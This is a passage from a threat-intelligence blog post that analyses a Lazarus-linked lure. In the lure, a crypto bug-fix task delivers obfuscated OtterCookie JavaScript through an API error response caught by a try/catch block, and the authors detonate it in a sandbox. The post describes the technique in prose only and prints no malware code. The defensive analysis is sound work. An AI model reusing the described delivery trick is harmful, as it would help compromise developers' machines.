stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Reaching out to the API and triggering a fabricated error reveals an interesting <strong>internal</strong> output, where we can see that our friends are indeed using <strong>Windows</strong>&#8230; <em>with the Administrator user</em>.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!d0bX!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7391fef3-775d-4660-9261-03d6f8ca295d_2640x954.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!d0bX!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7391fef3-775d-4660-9261-03d6f8ca295d_2640x954.png 424w, https://substackcdn.com/image/fetch/$s_!d0bX!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7391fef3-775d-4660-9261-03d6f8ca295d_2640x954.png 848w, https://substackcdn.com/image/fetch/$s_!d0bX!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7391fef3-775d-4660-9261-03d6f8ca295d_2640x954.png 1272w, https://substackcdn.com/image/fetch/$s_!d0bX!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7391fef3-775d-4660-9261-03d6f8ca295d_2640x954.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!d0bX!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7391fef3-775d-4660-9261-03d6f8ca295d_2640x954.png" width="1456" height="526" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/7391fef3-775d-4660-9261-03d6f8ca295d_2640x954.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:526,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:505596,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/161100611?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7391fef3-775d-4660-9261-03d6f8ca295d_2640x954.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!d0bX!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7391fef3-775d-4660-9261-03d6f8ca295d_2640x954.png 424w, https://substackcdn.com/image/fetch/$s_!d0bX!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7391fef3-775d-4660-9261-03d6f8ca295d_2640x954.png 848w, https://substackcdn.com/image/fetch/$s_!d0bX!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7391fef3-775d-4660-9261-03d6f8ca295d_2640x954.png 1272w, https://substackcdn.com/image/fetch/$s_!d0bX!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7391fef3-775d-4660-9261-03d6f8ca295d_2640x954.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Running internet-facing services as a privileged user&#8212;worse yet, as <strong>Administrator</strong>&#8212;<strong>is a bad idea</strong> and Wilton will find out about it pretty soon. </p><p>The other service running on port 7777 is <strong>Remote Desktop Protocol</strong>, which allows us to authenticate&#8212;<em>if only we had the necessary credentials</em>.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!sPnU!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2fcd9faa-61b3-4f8e-8ee2-311d046f3bdb_1324x754.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!sPnU!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2fcd9faa-61b3-4f8e-8ee2-311d046f3bdb_1324x754.png 424w, https://substackcdn.com/image/fetch/$s_!sPnU!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2fcd9faa-61b3-4f8e-8ee2-311d046f3bdb_1324x754.png 848w, https://substackcdn.com/image/fetch/$s_!sPnU!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2fcd9faa-61b3-4f8e-8ee2-311d046f3bdb_1324x754.png 1272w, https://substackcdn.com/image/fetch/$s_!sPnU!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2fcd9faa-61b3-4f8e-8ee2-311d046f3bdb_1324x754.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!sPnU!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2fcd9faa-61b3-4f8e-8ee2-311d046f3bdb_1324x754.png" width="1324" height="754" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/2fcd9faa-61b3-4f8e-8ee2-311d046f3bdb_1324x754.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:754,&quot;width&quot;:1324,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:327411,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/161100611?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2fcd9faa-61b3-4f8e-8ee2-311d046f3bdb_1324x754.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!sPnU!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2fcd9faa-61b3-4f8e-8ee2-311d046f3bdb_1324x754.png 424w, https://substackcdn.com/image/fetch/$s_!sPnU!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2fcd9faa-61b3-4f8e-8ee2-311d046f3bdb_1324x754.png 848w, https://substackcdn.com/image/fetch/$s_!sPnU!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2fcd9faa-61b3-4f8e-8ee2-311d046f3bdb_1324x754.png 1272w, https://substackcdn.com/image/fetch/$s_!sPnU!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2fcd9faa-61b3-4f8e-8ee2-311d046f3bdb_1324x754.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>But that&#8217;s a story <em>for another day</em>. They don&#8217;t know we know, so let&#8217;s use that to our tactical advantage.</p><p>Using <strong><a href="https://app.any.run">ANY.RUN</a></strong>&#8217;s sandbox, we spin up a disposable <strong><a href="https://ubuntu.com">Ubuntu</a></strong> machine, install <strong><a href="https://nodejs.org">NodeJs</a></strong>, and run the code as if we were an unsuspecting victim trying to make a quick <strong>500 USDT</strong> (remember we&#8217;re here for that reason after all?).</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!ySB-!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9106e1c4-d9c6-4c53-83c9-7596f3e38791_1611x1049.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!ySB-!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9106e1c4-d9c6-4c53-83c9-7596f3e38791_1611x1049.png 424w, https://substackcdn.com/image/fetch/$s_!ySB-!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9106e1c4-d9c6-4c53-83c9-7596f3e38791_1611x1049.png 848w, https://substackcdn.com/image/fetch/$s_!ySB-!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9106e1c4-d9c6-4c53-83c9-7596f3e38791_1611x1049.png 1272w, https://substackcdn.com/image/fetch/$s_!ySB-!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9106e1c4-d9c6-4c53-83c9-7596f3e38791_1611x1049.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!ySB-!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9106e1c4-d9c6-4c53-83c9-7596f3e38791_1611x1049.png" width="1456" height="948" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/9106e1c4-d9c6-4c53-83c9-7596f3e38791_1611x1049.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:948,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:841458,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/161100611?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9106e1c4-d9c6-4c53-83c9-7596f3e38791_1611x1049.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!ySB-!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9106e1c4-d9c6-4c53-83c9-7596f3e38791_1611x1049.png 424w, https://substackcdn.com/image/fetch/$s_!ySB-!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9106e1c4-d9c6-4c53-83c9-7596f3e38791_1611x1049.png 848w, https://substackcdn.com/image/fetch/$s_!ySB-!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9106e1c4-d9c6-4c53-83c9-7596f3e38791_1611x1049.png 1272w, https://substackcdn.com/image/fetch/$s_!ySB-!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9106e1c4-d9c6-4c53-83c9-7596f3e38791_1611x1049.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Running the code, of course, triggers the <strong>mandatory failure</strong>, which bumps into the <strong>Try/Catch</strong> block, which receives the error from the <strong>Finnish API</strong>. </p><p>But what does that error say? <strong>It&#8217;s an <a href="https://en.wikipedia.org/wiki/Obfuscation_(software)">obfuscated</a> JavaScript snippet.</strong></p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!ju41!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F85f1da79-777a-484e-89d4-7382c81824e1_1611x1049.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!ju41!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F85f1da79-777a-484e-89d4-7382c81824e1_1611x1049.png 424w, https://substackcdn.com/image/fetch/$s_!ju41!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F85f1da79-777a-484e-89d4-7382c81824e1_1611x1049.png 848w, https://substackcdn.com/image/fetch/$s_!ju41!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F85f1da79-777a-484e-89d4-7382c81824e1_1611x1049.png 1272w, https://substackcdn.com/image/fetch/$s_!ju41!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F85f1da79-777a-484e-89d4-7382c81824e1_1611x1049.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!ju41!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F85f1da79-777a-484e-89d4-7382c81824e1_1611x1049.png" width="1456" height="948" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/85f1da79-777a-484e-89d4-7382c81824e1_1611x1049.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:948,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:828230,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/161100611?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F85f1da79-777a-484e-89d4-7382c81824e1_1611x1049.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!ju41!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F85f1da79-777a-484e-89d4-7382c81824e1_1611x1049.png 424w, https://substackcdn.com/image/fetch/$s_!ju41!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F85f1da79-777a-484e-89d4-7382c81824e1_1611x1049.png 848w, https://substackcdn.com/image/fetch/$s_!ju41!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F85f1da79-777a-484e-89d4-7382c81824e1_1611x1049.png 1272w, https://substackcdn.com/image/fetch/$s_!ju41!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F85f1da79-777a-484e-89d4-7382c81824e1_1611x1049.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>This would be executed <strong>directly</strong> on our local machine while we&#8217;re distracted trying to submit a patch for a visual bug. <strong>Lazarus</strong> <strong>loves obfuscating JavaScript</strong> <strong>code with a <a href="http://obf-io.deobfuscate.io">popular online tool</a></strong>, but since they don&#8217;t know we know, we&#8217;ll use it <strong>against</strong> them.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!HrKs!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fffc2ea75-66ca-415a-9cc4-5494acd0d49d_2990x2070.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!HrKs!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fffc2ea75-66ca-415a-9cc4-5494acd0d49d_2990x2070.png 424w, https://substackcdn.com/image/fetch/$s_!HrKs!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fffc2ea75-66ca-415a-9cc4-5494acd0d49d_2990x2070.png 848w, https://substackcdn.com/image/fetch/$s_!HrKs!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fffc2ea75-66ca-415a-9cc4-5494acd0d49d_2990x2070.png 1272w, https://substackcdn.com/image/fetch/$s_!HrKs!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fffc2ea75-66ca-415a-9cc4-5494acd0d49d_2990x2070.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!HrKs!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fffc2ea75-66ca-415a-9cc4-5494acd0d49d_2990x2070.png" width="1456" height="1008" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/ffc2ea75-66ca-415a-9cc4-5494acd0d49d_2990x2070.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1008,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:1393967,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/161100611?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fffc2ea75-66ca-415a-9cc4-5494acd0d49d_2990x2070.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!HrKs!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fffc2ea75-66ca-415a-9cc4-5494acd0d49d_2990x2070.png 424w, https://substackcdn.com/image/fetch/$s_!HrKs!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fffc2ea75-66ca-415a-9cc4-5494acd0d49d_2990x2070.png 848w, https://substackcdn.com/image/fetch/$s_!HrKs!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fffc2ea75-66ca-415a-9cc4-5494acd0d49d_2990x2070.png 1272w, https://substackcdn.com/image/fetch/$s_!HrKs!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fffc2ea75-66ca-415a-9cc4-5494acd0d49d_2990x2070.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>At first glance, it looks like <strong><a href="https://any.run/cybersecurity-blog/invisibleferret-malware-analysis/#the-beaver-11077">BeaverTail</a></strong>&#8212;one of <strong>Lazarus</strong>&#8217; latest cyberweapons, commonly paired with <strong><a href="https://any.run/cybersecurity-blog/invisibleferret-malware-analysis/#the-ferrets-11077">InvisibleFerret</a></strong>&#8212;but on closer inspection, it turns out to be another animal we still didn&#8217;t have in our personal collection: <strong><a href="https://thehackernews.com/2024/12/north-korean-hackers-deploy-ottercookie.html">OtterCookie</a></strong>.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" 